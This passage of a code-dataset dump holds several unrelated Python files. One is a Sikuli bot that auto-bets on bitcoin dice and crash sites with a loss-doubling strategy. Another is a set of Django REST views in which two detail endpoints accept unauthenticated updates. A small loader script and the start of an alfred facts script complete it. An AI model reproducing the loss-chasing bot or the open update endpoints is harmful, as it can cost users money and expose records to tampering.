exit()\n\n# Use only in freebitcoin\ndef isLost():\n    recognize = Region(Region(805,564,289,38)).text()\n    result = str(recognize).find(\"lose\")\n    if result > 0:\n        return True\n    else:\n        return False\n    \n# Known sites like freebitcoin\ndef getBalance():\n    global substract\n    currentBalance = balance\n    return currentBalance\n\n# Used to recognize the PrimeDice site\ndef getBalancePD():\n    PDBalance = Region(1194,122,172,48).text()\n    return PDBalance\n\ndef getBalanceByRecognize():\n    cycle = 0\n    try:\n        tit = find(Pattern(\"1523137656416.png\").similar(0.77))\n        regionBalance = Region(tit.x - 20, tit.y, 200, tit.h)\n        \n        s = regionBalance.text()\n        \n        newBalance = str(s)\n        newConvert = \"\"\n        for letter in newBalance:\n            \n            if cycle >= 11:\n                if letter.isdigit() or letter == '.':\n                    newConvert = newConvert + letter\n                    #popError(newConvert)\n            cycle += 1\n        \n        convertedInteger = newConvert\n        #popError(str(convertedInteger))\n        if float(convertedInteger) == 0:\n            popError(\"Not enough balance.\")\n            exit()\n        return convertedInteger\n    except ValueError as e:\n        print(e)\n        #popError(\"Error recognizing balance: {}\".format(e.args))\n        isPlaying = False\n        return 0\n\n# Recognize a screen element, then click below it\ndef getBetField():\n    try:\n        title = exists(\"BEFAMOUNT.png\")\n        title.click(Pattern(\"BEFAMOUNT.png\").targetOffset(66,37))\n        regionBet = Region(title.x + 50, title.y + 30, title.w + 45, 35)\n        return regionBet.text()\n    except Exception:\n        click(Pattern(\"BETODDS.png\").targetOffset(260,-154))\n    \ndef set_odds(odds):\n    title = exists(\"BEFAMOUNT.png\")\n    title.doubleClick(Pattern(Pattern(\"BEFAMOUNT.png\").targetOffset(10,178)))\n    paste(str(odds))\n\n# Returns the total number of rolls made during the last session\ndef get_rolls():\n    return rolls\n\n# Converts a floating point value to the smallest bitcoin unit.\ndef fixNumber(x):\n    return '{:.8f}'.format(float(x))\n\n# Strategy where a random choice is made between High and Low.\ndef RandomBetHiLo(waitingTime=0.5):\n    # 0001 0001 0101 1110 1001\n    rndNum = random.randint(0, 1)\n    if rndNum == 0:\n        type(\"H\")\n    else:\n        type(\"L\")\n    wait(waitingTime)\n\n# Strategy where the opposite of the last win is chosen.\ndef OppositeToLastWin(waitingtime=0.5):\n    global lastVictoryHiLo\n    type(lastVictoryHiLo)\n    wait(waitingtime)\n\ndef check_requirements(value, limit = 0.15): \n    if value < limit:\n        value = limit\n    return value\n\ndef presetload_autobet():\n    try:\n        if exists(\"PAYOUT.png\"):\n
click(Pattern(\"PAYOUT.png\").targetOffset(421,-265))\n wait(0.1)\n doubleClick(Pattern(\"BASEBET.png\").similar(0.91).targetOffset(86,0))\n wait(0.3)\n #type(\"A\", KeyModifier.CTRL)\n paste(\"0.00000025\")\n wait(0.3)\n type(Key.TAB)\n type(Key.TAB)\n type(\"A\", KeyModifier.CTRL)\n type(\"3\")\n wait(0.1)\n type(Key.TAB)\n paste(\"10000000\")\n wait(0.1)\n click(Pattern(\"ONLOSEONWIN.png\").targetOffset(55,-1))\n wait(0.2)\n type(Key.TAB)\n type(Key.TAB)\n type(Key.SPACE)\n type(Key.TAB)\n type(\"A\" , KeyModifier.CTRL)\n type(\"200\")\n wait(0.2)\n type(Key.TAB)\n type(Key.SPACE)\n type(Key.TAB)\n type(\"A\" , KeyModifier.CTRL)\n type(\"3\")\n type(Key.TAB)\n type(Key.TAB)\n type(Key.TAB)\n type(Key.TAB)\n type(Key.SPACE)\n type(Key.TAB)\n type(Key.SPACE)\n\n except:\n popup(\"Error during auto bet settings\")\n\ndef between(value, a, b):\n # Find and validate before-part.\n pos_a = value.find(a)\n if pos_a == -1: return \"\"\n # Find and validate after part.\n pos_b = value.rfind(b)\n if pos_b == -1: return \"\"\n # Return middle part.\n adjusted_pos_a = pos_a + len(a)\n if adjusted_pos_a >= pos_b: return \"\"\n return value[adjusted_pos_a:pos_b]\n\ndef after(value, a):\n # Find and validate first part.\n pos_a = value.rfind(a)\n if pos_a == -1: return \"\"\n # Returns chars after the found string.\n adjusted_pos_a = pos_a + len(a)\n if adjusted_pos_a >= len(value): return \"\"\n return value[adjusted_pos_a:]\n\ndef before(value, a):\n # Find first part and return slice before it.\n pos_a = value.find(a)\n if pos_a == -1: return \"\"\n return value[0:pos_a]\ndef getbustoBitMultiplier():\n mbits_multiplier = str(Region(Region(97,335,538,135)).text())\n #recognize = between(mbits_multiplier,\"@\",\"x\")\n return mbits_multiplier \n\ndef getbustoBitBalance():\n mbits_balance = str(Region(Region(1739,124,128,35)).text())\n #newConverted = after(mbits_balance, \"BITS:\")\n #newConvertedBefore = before(newConverted, \".\")\n try:\n recognize = between(mbits_balance,\":\",\".\")\n except ValueError:\n recognize = after(mbits_balance,\"BITS:\")\n newConvertedNoSpace = recognize.replace(\" \",\"\")\n newConverted = int(newConvertedNoSpace.replace(\",\",\"\"))\n return newConverted\n\ndef chat(write_text):\n if DEBUG_CHAT is True:\n if Region(Region(1157,591,91,371)).exists(\"1525141408338.png\"):\n chattingRegion.click()\n chattingRegion.paste(write_text)\n chattingRegion.type(Key.ENTER)\n print(\"[CHAT] {}\".format(write_text))\n else:\n print(\"[DEBUG] {}\".format(write_text))\n \ndef starting_values():\n global rolls\n global timerMod\n global active\n global lastVictoryHiLo\n global lastBalance\n global countKeyPressed\n global lostTimes\n global zazor\n global isStarted\n global oddTimesCount\n global oddTimes\n global starting3\n global balance\n global rateup\n global maxLost\n global startingBet\n global strategy\n global initStartingBet\n global GAME_IN_PROGRESS\n global won\n global NUMLOSE_TO_START_WAITING\n global FIRST_GAME\n global DEBUG_CHAT\n global PAYOUT\n global INIT_PAYOUT\n\n PAYOUT = 1.5\n INIT_PAYOUT = 2\n FIRST_GAME = True\n DEBUG_CHAT = False\n NUMLOSE_TO_START_WAITING = 6\n won = True\n loss_in_row = 0\n strategy = 0\n GAME_IN_PROGRESS = False\n\n startingBet = 0\n initStartingBet = 0\n rateup = 2\n maxLost = 0 \n balance = 0\n starting3 = False\n oddTimes = 2\n oddTimesCount = 0\n isStarted = True\n zazor = False\n lostTimes = 0\n rolls = 0\n countKeyPressed = 0\n timerMod = 0\n active = False\n lastVictoryHiLo = \"H\"\n regionResult.setFindFailedResponse(PROMPT)\n\n 
showROI(\"primedice.com\")\n\n if workingOnFaucet == \"primedice.com\":\n print(workingOnFaucet)\n print(\"Starting balance: {}\".format(getBalancePD()))\n else:\n print(\"Starting balance: {}\".format(getBalance()))\n\n\nstarting_values()\n\n# User interactions to choose special values for loop\nif gambling is False:\n strategy = int(input(\"Choose strategy: [1] Random(easy), [2] Opposite(medium), [3] Special(hard)\", '1'))\n \n \nif strategy == 4:\n presetload_autobet()\n popup(\"Done, settings placed\")\n\nif gambling is False:\n balance = float(input(\"Enter your balance\", \"0\"))\n distance = int(input('Write distance before start multiplier. Default is 1', '1'))\n boting_speed = float(input(\"Write for bot in floating point value of milliseconds, Default is 0.5, i.o. 500 ms\", \"0.5\"))\n rates = float(input(\"Writes rates\", \"7.5\"))\n check_requirements(boting_speed, 0.2)\n popup(\"To stop script during play, press CTRL+SHIFT+X\")\n \nif strategy == 3:\n set_odds(rates)\n rateup = rates\n\nif gambling is True:\n lastBalance = getbustoBitBalance()\n print(\"Starting gambling balance is {}\".format(str(getbustoBitBalance())))\n initStartingBet = int(input(\"Enter starting bet...\",\"1\"))\n startingBet = initStartingBet\n NUMLOSE_TO_START_WAITING = int(input(\"Enter amount lose in a row, to start waiting\", \"6\"))\n# Starting loop\nwhile True:\n if not isStarted:\n stopApp()\n if hotKeyX:\n stopApp()\n\n \n if gambling is True:\n rolls += 1\n \n chat(\"Cycle #{} started\".format(rolls))\n chat(\"I can make bet {oc}, {oc2} times\".format(oc = initStartingBet, oc2 = str(getbustoBitBalance() // initStartingBet)))\n #GAME_IN_PROGRESS = False\n\n lastBalance = getbustoBitBalance()\n if Region(645,214,632,242).exists(\"1524845425338.png\") and GAME_IN_PROGRESS is False:\n if Region(645,214,632,242).exists(\"BETTING.png\"):\n wait(1)\n else:\n \n Settings.MoveMouseDelay = 0.3\n wait(1.5)\n \n \n click(Pattern(\"MANUAL-1.png\").targetOffset(-236,61))\n wait(0.3)\n type(\"a\" , KeyModifier.CTRL)\n if won is False:\n startingBet = int(startingBet * 2.5)\n lostTimes += 1\n PAYOUT = INIT_PAYOUT\n if lostTimes == 4:\n startingBet *= int(1.3)\n PAYOUT = 1.66\n if won is True:\n startingBet = initStartingBet\n lostTimes = 0\n PAYOUT = PAYOUT + 0.5\n wait(0.3)\n if getbustoBitBalance() > startingBet:\n type(str(startingBet))\n type(Key.TAB)\n type(\"a\" , KeyModifier.CTRL)\n type(str(PAYOUT))\n else:\n chat(\"Not enough balance to make a bet.\")\n startingBet = int(getbustoBitBalance() / 3)\n type(str(startingBet))\n type(Key.TAB)\n type(\"a\" , KeyModifier.CTRL)\n type(str(INIT_PAYOUT))\n Settings.MoveMouseDelay = 0\n \n if lostTimes < NUMLOSE_TO_START_WAITING and GAME_IN_PROGRESS is False:\n click(Pattern(\"MANUAL-1.png\").targetOffset(-66,176))\n GAME_IN_PROGRESS = True\n else:\n chat(\"starting to observe\")\n while not Region(23,191,609,352).exists(\"1524846029417.png\"):\n wait(0.3)\n GAME_IN_PROGRESS = True\n else:\n #if between(Region(Region(95,340,536,110)).text(),\"@\",\"x\") > 2:\n if before(Region(Region(145,595,148,38)).text(),\"x\") > 2: \n chat(before(Region(Region(145,595,148,38)).text(),\"x\"))\n lostTimes = 0\n wait(1)\n click(Pattern(\"MANUAL-1.png\").targetOffset(-66,176))\n else:\n lostTimes = NUMLOSE_TO_START_WAITING\n GAME_IN_PROGRESS = False\n\n while not Region(23,191,609,352).exists(\"1524846029417.png\") and GAME_IN_PROGRESS is True:\n wait(0.3)\n else:\n\n if lastBalance < getbustoBitBalance():\n\n print(\"sentences {} < 
{}\".format(str(lastBalance),str(getbustoBitBalance())))\n won = True\n print(\"LastBalance:{} NewBalance Won: {}\".format(lastBalance, getbustoBitBalance()))\n\n if lastBalance > getbustoBitBalance():\n\n print(\"sentences {} > {}\".format(str(lastBalance),str(getbustoBitBalance())))\n won = False\n print(\"Loss, {}\".format(getbustoBitBalance()))\n chat(\"Game #{oc} has ended with balance of {oc2} bits.\".format(oc=str(rolls), oc2=str(getbustoBitBalance())))\n GAME_IN_PROGRESS = False\n\n print(\"Loss in a row {}\".format(str(lostTimes)))\n wait(0.5)\n \n FIRST_GAME = False\n else:\n lastBalance = float(getBalance())\n print(\"Roll {}, balance: {}\".format(get_rolls(), getBalance()))\n if strategy == 1:\n RandomBetHiLo(boting_speed)\n if strategy == 2:\n OppositeToLastWin(boting_speed)\n if strategy == 3:\n if not starting3:\n set_odds(rateup)\n starting3 = True\n getBetField()\n RandomBetHiLo(boting_speed) \n \n #if float(getBalance()) < lastBalance:\n if isLost():\n print(\"current {} < {} from last bet = LOST\".format(fixNumber(getBalancePD()), fixNumber(lastBalance)))\n lostTimes += 1\n if maxLost < lostTimes:\n maxLost = lostTimes\n if lostTimes >= distance:\n type(\"S\")\n substract *= 2\n zazor = True\n if lastVictoryHiLo == \"H\":\n lastVictoryHiLo = \"L\"\n else:\n lastVictoryHiLo = \"H\"\n else:\n print(\"current {} > {} from last bet = VICTORY\".format(fixNumber(getBalancePD()), fixNumber(lastBalance)))\n if not zazor:\n lostTimes = 0\n lostTimes = 0\n type(\"D\")\n substract = balance - (0.00000001 * substract) \n if strategy == 3: \n set_odds(rateup)\n #type(\"EQ\")\n oddTimesCount = 0\n getBetField()\n if strategy != 3:\n \n if timerMod <= 0:\n if active:\n type(\"W\")\n active = False\n timerMod = 5\n else:\n type(\"Q\")\n active = True\n timerMod = 5\n timerMod -= 1\n else:\n if timerMod <= 0:\n \n oddTimesCount += 1\n if oddTimesCount > 10:\n set_odds(2)\n getBetField() \n timerMod = 3\n else:\n type(\"W\")\n if oddTimesCount > 12:\n rateup = rateup + 1\n set_odds(rateup)\n getBetField()\n oddTimesCount = 0\n timerMod = 2\n else:\n timerMod = 3\n timerMod -= 1 ","sub_path":"presetLite.sikuli/presetLite.py","file_name":"presetLite.py","file_ext":"py","file_size_in_byte":16478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"517623830","text":"from django.shortcuts import render, HttpResponse\nfrom django.contrib.auth import authenticate\n\nfrom ..models.profile import Profile\nfrom django.contrib.auth.models import User\n\nfrom rest_framework import status, permissions\nfrom rest_framework.parsers import JSONParser \nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.authtoken.models import Token\n\nfrom ..permissions import AllowOnlyAdminFASTUR, AllowOnlyAdminHUMAS, AllowOnlyAdminPKM, AllowOnlyMahasiswa\n\nfrom ..models.humas import PerizinanPublikasi, PermintaanProtokoler, PermintaanSouvenir, JenisPublikasi, Souvenir, JenisIzinPublikasi\nfrom ..models.izin_kegiatan import IzinKegiatan\n\nfrom ..serializers.humas_serializer import PermintaanSouvenirHumasSerializer,PerizinanPublikasiSerializer,PermintaanProtokolerSerializer, PerizinanKegiatanSerializer, JenisPublikasiSerializer,SouvenirSerializer,PerizinanPublikasiSerializer, PerizinKegiatanHumasSerializer, JenisIzinPublikasiSerializer,JenisIzinPublikasiHumasSerializer, 
PermintaanSouvenirSerializer\n\nfrom django.utils import timezone\nfrom django.http.response import JsonResponse\nfrom rest_framework.decorators import parser_classes\nfrom rest_framework.parsers import MultiPartParser, FormParser\n\n@api_view(['GET'])\n@permission_classes([AllowOnlyAdminHUMAS]) #admin humas\ndef get_list_perizinan_humas(request): \n if request.method == 'GET': # get list seluruh izin kegiatan (humas)\n list_izin_kegiatan = IzinKegiatan.objects.filter(status_perizinan_kegiatan=2)\n list_izin_kegiatan_serialized = PerizinKegiatanHumasSerializer(list_izin_kegiatan, many=True)\n return JsonResponse(list_izin_kegiatan_serialized.data, safe=False)\n \n #case for else\n return JsonResponse({'message' : 'invalid API method'}, status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n@api_view(['GET', 'POST'])\n@permission_classes([AllowOnlyAdminHUMAS | AllowOnlyMahasiswa]) #mahasiswa dan admin humas\ndef get_post_perizinan_humas_by_id_izin_kegiatan(request,id_izin_kegiatan):\n try: \n izin_kegiatan =IzinKegiatan.objects.get(pk=id_izin_kegiatan)\n except:\n return JsonResponse({'message': 'Izin kegiatan tidak ada'}, status=status.HTTP_404_NOT_FOUND)\n\n if request.method == 'POST':\n permintaan_data = JSONParser().parse(request)\n permintaan_humas_serialized = PerizinanKegiatanSerializer(izin_kegiatan, data = permintaan_data)\n if permintaan_humas_serialized.is_valid():\n permintaan_humas_serialized.save()\n return JsonResponse(permintaan_humas_serialized.data,safe=False)\n return JsonResponse(permintaan_humas_serialized.errors, status = status.HTTP_400_BAD_REQUEST)\n\n if request.method == 'GET': # get izin kegiatan (humas)\n detail_perizinan_humas_kegiatan_serialized = PerizinKegiatanHumasSerializer(izin_kegiatan)\n return JsonResponse(detail_perizinan_humas_kegiatan_serialized.data, safe=False)\n \n #case for else\n return JsonResponse({'message' : 'invalid API method'}, status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n@api_view(['PUT',])\n@permission_classes([AllowOnlyAdminHUMAS]) #admin humas \ndef update_permintaan_souvenir_by_id_permintaan_souvenir(request, id_permintaan):\n try:\n permintaan_souvenir =PermintaanSouvenir.objects.get(pk=id_permintaan)\n except:\n return JsonResponse({'message': 'Permintaan souvenir tidak ada'}, status=status.HTTP_404_NOT_FOUND)\n\n if request.method == 'PUT':\n peminjaman_data = JSONParser().parse(request) \n try:\n permintaan_souvenir.status_permintaan_souvenir = peminjaman_data['status_permintaan_souvenir']\n permintaan_souvenir.updated_at = timezone.now()\n if peminjaman_data['alasan_penolakan'] is not None:\n permintaan_souvenir.alasan_penolakan = peminjaman_data['alasan_penolakan']\n permintaan_souvenir.save()\n return JsonResponse(PermintaanSouvenirHumasSerializer(permintaan_souvenir).data, safe=False)\n except:\n return JsonResponse({'message': 'Terjadi kesalahan'}, status=status.HTTP_400_BAD_REQUEST)\n return JsonResponse({'message': 'Terjadi kesalahan'}, status=status.HTTP_400_BAD_REQUEST) \n \n #case for else\n return JsonResponse({'message' : 'invalid API method'}, status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n@api_view(['PUT',])\n@permission_classes([AllowOnlyAdminHUMAS]) #admin humas\ndef update_permintaan_protokoler_by_id_permintaan_protokoler(request, id_permintaan):\n try:\n permintaan_protokoler = PermintaanProtokoler.objects.get(pk=id_permintaan)\n except:\n return JsonResponse({'message': 'Permintaan protokoler tidak ada'}, status=status.HTTP_404_NOT_FOUND)\n\n if request.method == 'PUT':\n peminjaman_data = JSONParser().parse(request) 
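# parse the JSON body of the PUT request before applying the status update below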
\n try:\n permintaan_protokoler.status_permintaan_protokoler = peminjaman_data['status_permintaan_protokoler']\n permintaan_protokoler.updated_at = timezone.now()\n if peminjaman_data['alasan_penolakan'] is not None:\n permintaan_protokoler.alasan_penolakan = peminjaman_data['alasan_penolakan']\n permintaan_protokoler.save()\n return JsonResponse(PermintaanProtokolerSerializer(permintaan_protokoler).data, safe=False)\n except:\n return JsonResponse({'message': 'Terjadi kesalahan'}, status=status.HTTP_400_BAD_REQUEST)\n return JsonResponse({'message': 'Terjadi kesalahan'}, status=status.HTTP_400_BAD_REQUEST) \n \n #case for else\n return JsonResponse({'message' : 'invalid API method'}, status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n@api_view(['PUT',])\n@permission_classes([AllowOnlyAdminHUMAS]) #nanti diganti jadi admin humas\ndef update_jenis_izin_publikasi_by_id_jenis_izin_publikasi(request, id_jenis_izin_publikasi):\n try:\n jenis_izin_publikasi = JenisIzinPublikasi.objects.get(pk=id_jenis_izin_publikasi)\n except:\n return JsonResponse({'message': 'Jenis izin publikasi tidak ada'}, status=status.HTTP_404_NOT_FOUND)\n\n if request.method == 'PUT':\n perizinan_data = JSONParser().parse(request) \n try:\n jenis_izin_publikasi.status_perizinan_publikasi = perizinan_data['status_perizinan_publikasi']\n if perizinan_data['alasan_penolakan'] is not None:\n jenis_izin_publikasi.alasan_penolakan = perizinan_data['alasan_penolakan']\n jenis_izin_publikasi.save()\n jenis_izin_publikasi_serialized = JenisIzinPublikasiHumasSerializer(jenis_izin_publikasi)\n try:\n perizinan_publikasi = PerizinanPublikasi.objects.get(pk=perizinan_data['id_perizinan_publikasi'])\n perizinan_publikasi.updated_at= timezone.now()\n perizinan_publikasi.save()\n except:\n pass\n return JsonResponse(JenisIzinPublikasiHumasSerializer(jenis_izin_publikasi).data, safe=False)\n except:\n return JsonResponse({'message': 'Terjadi kesalahan'}, status=status.HTTP_400_BAD_REQUEST)\n return JsonResponse({'message': 'Terjadi kesalahan'}, status=status.HTTP_400_BAD_REQUEST) \n \n #case for else\n return JsonResponse({'message' : 'invalid API method'}, status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n@api_view(['POST'])\n@permission_classes([AllowOnlyMahasiswa]) #mahasiswa\n@parser_classes([MultiPartParser, FormParser])\ndef post_perizinan_publikasi(request):\n if request.method == 'POST': # post perizinan_publikasi\n perizinan_data_serialized = PerizinanPublikasiSerializer(data=request.data)\n if perizinan_data_serialized.is_valid():\n perizinan_data_serialized.save()\n \n # menyimpan jenis_izin_publikasi dari list jenis_publikasi\n jenis_publikasi_string = request.data['jenis_publikasi']\n print(request.data['jenis_publikasi'])\n print(jenis_publikasi_string)\n if jenis_publikasi_string != '':\n jenis_publikasi_list = [data.strip() for data in jenis_publikasi_string.split(',')]\n for jenis_publikasi in jenis_publikasi_list: # menyimpan setiap jenis_izin_publikasi\n jenis_izin_publikasi_data = {\n \"jenis_publikasi\" : jenis_publikasi,\n \"status_perizinan_publikasi\": \"1\",\n \"alasan_penolakan\": ''\n }\n jenis_izin_publikasi_serialized = JenisIzinPublikasiSerializer(PerizinanPublikasi.objects.last(),data=jenis_izin_publikasi_data)\n if jenis_izin_publikasi_serialized.is_valid():\n jenis_izin_publikasi_serialized.save()\n \n return JsonResponse(perizinan_data_serialized.data,status=status.HTTP_201_CREATED,safe=False)\n return JsonResponse(perizinan_data_serialized.errors, status=status.HTTP_400_BAD_REQUEST)\n \n #case for else\n return 
JsonResponse({'message' : 'invalid API method'}, status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n@api_view(['GET'])\n@permission_classes([AllowOnlyAdminHUMAS | AllowOnlyMahasiswa ]) #mahasiswa dan admin humas\ndef get_jenis_publikasi(request):\n if request.method == 'GET':\n list_jenis_publikasi = JenisPublikasi.objects.all()\n list_jenis_publikasi_serialized = JenisPublikasiSerializer(list_jenis_publikasi, many=True)\n return JsonResponse(list_jenis_publikasi_serialized.data,safe=False)\n \n #case for else\n return JsonResponse({'message' : 'invalid API method'}, status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n@api_view(['GET'])\n@permission_classes([AllowOnlyAdminHUMAS | AllowOnlyMahasiswa ]) # mahasiswa dan admin humas\ndef get_list_souvenir(request):\n if request.method == 'GET':\n list_souvenir = Souvenir.objects.all()\n list_souvenir_serialized = SouvenirSerializer(list_souvenir, many=True)\n return JsonResponse(list_souvenir_serialized.data,safe=False)\n\n \n #case for else\n\n return JsonResponse({'message' : 'invalid API method'}, status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n@api_view(['POST'])\n@permission_classes([AllowOnlyAdminHUMAS])\ndef post_souvenir(request):\n if request.method == 'POST':\n souvenir_data = JSONParser().parse(request)\n souvenir_serializer = SouvenirSerializer(data=souvenir_data)\n if souvenir_serializer.is_valid():\n souvenir_serializer.save()\n return JsonResponse(souvenir_serializer.data, status=status.HTTP_201_CREATED)\n data = {\n 'message' : 'invalid API call'\n }\n return Response(data=data, status=status.HTTP_400_BAD_REQUEST)\n\n@api_view(['GET','PUT', 'DELETE'])\n@permission_classes([AllowOnlyAdminHUMAS])\ndef detail_souvenir(request,pk):\n try:\n souvenir = Souvenir.objects.get(pk=pk)\n except Souvenir.DoesNotExist:\n return JsonResponse({'message': 'Souvenir tidak ada'}, status=status.HTTP_404_NOT_FOUND)\n\n if request.method == 'GET':\n souvenir_serialized = SouvenirSerializer(souvenir)\n return JsonResponse(souvenir_serialized.data, safe=False)\n# data = {\n# 'message' : 'invalid API call'\n# }\n# return Response(data=data, status=status.HTTP_400_BAD_REQUEST)\n elif request.method == 'PUT':\n souvenir_data = JSONParser().parse(request)\n souvenir_serializer = SouvenirSerializer(souvenir, data=souvenir_data)\n if souvenir_serializer.is_valid():\n souvenir_serializer.save()\n return JsonResponse(souvenir_serializer.data)\n return JsonResponse(souvenir_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n elif request.method == 'DELETE':\n souvenir.delete()\n return JsonResponse({'message': 'Souvenir berhasil dihapus'}, status=status.HTTP_204_NO_CONTENT)\n# #do something untuk request DELETE, misal hapus izin kegiatan yang sudah ada\n return JsonResponse({'message' : 'invalid API method'}, status=status.HTTP_405_METHOD_NOT_ALLOWED) \n\n@api_view(['GET','PUT'])\n@permission_classes([permissions.AllowAny,])\ndef detail_permintaan_protokoler(request,pk):\n try:\n permintaan_protokoler = PermintaanProtokoler.objects.get(pk=pk)\n except PermintaanProtokoler.DoesNotExist:\n return JsonResponse({'message': 'Permintaan protokoler tidak ada'}, status=status.HTTP_404_NOT_FOUND)\n\n if request.method == 'GET':\n permintaan_protokoler_serialized = PermintaanProtokolerSerializer(permintaan_protokoler)\n return JsonResponse(permintaan_protokoler_serialized.data, safe=False)\n # data = {\n # 'message' : 'invalid API call'\n # }\n elif request.method == 'PUT':\n permintaan_protokoler_data = JSONParser().parse(request)\n permintaan_protokoler_serializer = 
PermintaanProtokolerSerializer(permintaan_protokoler, data=permintaan_protokoler_data)\n        if permintaan_protokoler_serializer.is_valid():\n            permintaan_protokoler_serializer.save()\n            return JsonResponse(permintaan_protokoler_serializer.data)\n        return JsonResponse(permintaan_protokoler_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n#    #handle a DELETE request here if needed, e.g. remove an existing izin kegiatan\n    return JsonResponse({'message' : 'invalid API method'}, status=status.HTTP_405_METHOD_NOT_ALLOWED) \n\n@api_view(['GET','PUT'])\n@permission_classes([permissions.AllowAny,])\ndef detail_permintaan_souvenir(request,pk):\n    try:\n        permintaan_souvenir = PermintaanSouvenir.objects.get(pk=pk)\n    except PermintaanSouvenir.DoesNotExist:\n        return JsonResponse({'message': 'Permintaan souvenir tidak ada'}, status=status.HTTP_404_NOT_FOUND)\n\n    if request.method == 'GET':\n        permintaan_souvenir_serialized = PermintaanSouvenirSerializer(permintaan_souvenir)\n        return JsonResponse(permintaan_souvenir_serialized.data, safe=False)\n    elif request.method == 'PUT':\n        permintaan_souvenir_data = JSONParser().parse(request)\n        permintaan_souvenir_serializer = PermintaanSouvenirSerializer(permintaan_souvenir, data=permintaan_souvenir_data)\n        if permintaan_souvenir_serializer.is_valid():\n            permintaan_souvenir_serializer.save()\n            return JsonResponse(permintaan_souvenir_serializer.data)\n        return JsonResponse(permintaan_souvenir_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n    return JsonResponse({'message' : 'invalid API method'}, status=status.HTTP_405_METHOD_NOT_ALLOWED) \n\n@api_view(['PUT'])\n@permission_classes([AllowOnlyMahasiswa]) \n@parser_classes([MultiPartParser, FormParser])\ndef put_perizinan_publikasi(request, pk):\n    try:\n        perizinan_publikasi = PerizinanPublikasi.objects.get(pk=pk)\n    except PerizinanPublikasi.DoesNotExist: # catch the exception of the model actually queried here\n        return JsonResponse({'message': 'perizinan publikasi tidak ada'}, status=status.HTTP_404_NOT_FOUND)\n\n    if request.method == 'PUT': # update perizinan_publikasi\n        perizinan_data_serialized = PerizinanPublikasiSerializer(perizinan_publikasi, data=request.data)\n        if perizinan_data_serialized.is_valid():\n            perizinan_data_serialized.save()\n            \n            # save the jenis_izin_publikasi entries from the jenis_publikasi list\n            jenis_publikasi_string = request.data['jenis_publikasi']\n            print(request.data['jenis_publikasi'])\n            print(jenis_publikasi_string)\n            if jenis_publikasi_string != '':\n                jenis_publikasi_list = [data.strip() for data in jenis_publikasi_string.split(',')]\n                for jenis_publikasi in jenis_publikasi_list: # save each jenis_izin_publikasi\n                    jenis_izin_publikasi_data = {\n                        \"jenis_publikasi\" : jenis_publikasi,\n                        \"status_perizinan_publikasi\": \"1\",\n                        \"alasan_penolakan\": ''\n                    }\n                    jenis_izin_publikasi_serialized = JenisIzinPublikasiSerializer(perizinan_publikasi,data=jenis_izin_publikasi_data) # bind to the record being updated, not PerizinanPublikasi.objects.last()\n                    if jenis_izin_publikasi_serialized.is_valid():\n                        jenis_izin_publikasi_serialized.save()\n            \n            return JsonResponse(perizinan_data_serialized.data,status=status.HTTP_200_OK,safe=False) # 200 for an update; 201 is for creation\n        return JsonResponse(perizinan_data_serialized.errors, status=status.HTTP_400_BAD_REQUEST)\n    \n    #case for else\n    return JsonResponse({'message' : 'invalid API method'}, status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n","sub_path":"main/views/views_humas.py","file_name":"views_humas.py","file_ext":"py","file_size_in_byte":16655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"308693413","text":"from src.lib.DataLoader import DataLoader\n\nif 
__name__ == '__main__':\n posts_file = '../resources/Posts.txt'\n comments_file = '../resources/Comments.txt'\n metadata_file = '../resources/Meta.txt'\n\n loader = DataLoader()\n loader.load_posts(posts_file)\n loader.load_comments(comments_file)\n loader.load_metadata(metadata_file)\n\n print(\"Loaded...\")\n loader.get_post_timeline()\n","sub_path":"src/Execute.py","file_name":"Execute.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"55161540","text":"#!/usr/bin/env python3\n\nimport json\nimport gzip\nimport argparse\nimport pathlib\nimport subprocess\nfrom collections import defaultdict\n\nimport alfred.announce.utils\n\n\n# Create a recursive default dict\nrecursive_dict = lambda: defaultdict(recursive_dict)\n\n\n# Build up command line arguments definition\nargs_parser = argparse.ArgumentParser()\n\nargs_parser.add_argument('-d', '--directory',\n dest='base_path',\n type=pathlib.Path,\n action='store',\n help='path of the facts tree',\n default='/etc/alfred/facts')\n\nargs_parser.add_argument('-b', '--batman',\n dest='if_batman',\n action='store',\n help='the name of the batman-adv interface',\n default='bat')\n\nargs_parser.add_argument('-f', '--fastd',\n dest='if_fastd',\n action='store',\n help='the name of the fastd interface',\n default='mesh-vpn')\n\nargs_parser.add_argument('-i', '--interface',\n dest='if_bridge',\n action='store',\n help='the name of the bridge interface',\n default='br')\n\n\ndef main():\n # Parse the command line arguments\n args = args_parser.parse_args()\n\n # Walk all sub folders of base directory\n for type_path in args.base_path.iterdir():\n # Skip everything non-directory\n if not type_path.is_dir():\n continue\n\n # Skip hidden files\n if type_path.name.startswith('.'):\n continue\n\n # Extract the type id from the path\n type_id = int(type_path.name)\n\n # Prepare the result structure\n data = recursive_dict()\n\n # Walk all fact files recursively in base directory\n for fact_path in type_path.rglob('*'):\n # Skip folders\n if not fact_path.is_file():\n continue\n\n # Skip hidden files\n if fact_path.name.startswith('.'):\n continue\n\n # Open, read and compile the fact snippet wrapped in a function\n with fact_path.open() as f:\n code = compile(('def fact():\\n' +\n ''.join(' ' + line for line in f.readlines())),\n filename=str(fact_path),\n mode='exec')\n\n # Populate the globals for the snippet execution\n exec_globals = {}\n exec_globals.update(vars(args))\n exec_globals.update(vars(alfred.announce.utils))\n\n # Execute the facts code to get the function object - as the\n # function definition is executed, the function exists in the\n # globals directory after the execution\n exec(code, exec_globals)\n fact = exec_globals['fact']\n\n # Call the fact 